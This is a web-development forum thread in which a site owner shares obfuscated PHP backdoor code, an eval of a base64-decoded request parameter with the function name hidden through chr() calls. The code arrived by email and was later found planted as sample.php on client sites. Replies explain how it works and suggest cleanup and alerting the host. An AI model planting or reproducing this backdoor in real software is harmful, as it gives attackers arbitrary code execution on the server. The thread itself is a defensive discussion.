Attack Script via email?

Hi all,

Recently, I have started receiving php scripts via email.


(no subject)
Inbox

< … script language=“php”> $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval(a(_REQUEST[sam]));</script … >


My sites have been getting hacked lately. Any ideas on what type attack this is and how I can stop it?

Thanks

A vulnerable Contact form?

I use Contact 7 in Wordpress, but I removed the form page from the site. They can still access the plugin?

I just spoke with my hosting Live Chat. I couldn’t see the headers in the e-mail. The guy said it appears to be from Amazon. Not malicious. When I Google the script, however, it comes up “attack and defence” (sic) script.

Sounds odd that Amazon would go to the trouble of the "a = " when all they need to do is `base64_decode(_REQUEST[sam])`

And why REQUEST (both POST and GET) ?

Do you know what “sam” is?

surface to air missile?

Google showed it to be Wordpress ‘simple ads manager.’

Also brought up

http://aw-snap.info/articles/backdoor-examples.php

I took a quick look through Contact 7 and found no “sam”.

“simple ad manager” is likely the vulnerable script.

Seeing as

IMHO it is time to delete that plugin at least until it gets patched.

And if a backdoor has been uploaded to your site, time to backup your database and do a thorough replacement of all folders and files.

Sorry … I meant Google linked ‘sam’ with simple ad manager. I don’t use Simple Ad Manager. But, yeah, it appears as if a start-from-scratch strategy is the best.

What is the PHP chr function used for? What could they gain? I don’t have proprietary information or anything. And I really do not understand the this lead … http://www.hackingwithphp.com/4/7/3/converting-to-and-from-ascii

In this case it is being used to make base64_decode not be easily noticeable.

As for Amazon, no benefit that I can see. Why would they want to hide that if it’s legit?

If a script-kiddie on the other hand, it would make them feel “clever” and it would get by filters that look for the use of that function name as a string.

Irony is that most look for the function name “eval” so it’s moot here. The code will still trigger a red flag.

That… would be a security hole a mile wide. eval(base64_decode($_REQUEST[sam]));… "Take WHATEVER i put on the URL in the ‘sam’ variable and execute it. Whatever it is. sam = “unlink(index.php)”? Blow up your index file. dump your password file to the screen? Sure thing! Open up a hole into your database? Not a problem.

Agreed. But not knowing where “sam” is coming from, until determined what to do?

I’m thinking adding a DEFINE for “sam” as a CONSTANT into to the config file might help.

I got several of these emails and went back and looked to see if all of them were looking for ‘sam.’ One was not. It was

<?php =chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval(());

Okay, I run multiple sites for clients and I just

  1. deleted the Wordpress install
  2. used cPanel to protect the directory
  3. Deleted all files in the base directory
  4. waited (I have been having problems with my host’s cpanel directory-password protection option)

I just re-checked site, and there is a ‘sample’ php file on there, and it contains the one line: < … script language=“php”>
$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
eval(a(_REQUEST[sam]));

So email amazon’s spoofer email (stop-spoofing@amazon.com), attach the email in question, and tell them that someone appears to be using one of their clients’ contact systems as an attempt at hacking a site. (though why the email came to YOU is a good question.)

Why it came to me? Not sure why me specifically. My hosting account was suspended recently due to high-volume of CPU usage. These were just portfolio-type design sites, so I went through and deleted all the files and deleted the Wordpress installation. I changed the FTP password, but evidently my master account pw has been obtained because within 2 hours, this maddening sample.php file has appeared.

Wait… this code was in a file that you didnt create, sitting on your server?

Contact your hosting company again. Tell them their server’s been breached, and they need to do a complete system sweep on all accounts on the box.

Yes, I’m live-chatting with them at this moment. 70% of my client sites have this weird sample.php file on them.

Yes, it could very well be a shell with group affecting every sharing site and not only your site in particular.

The host really needs to know this.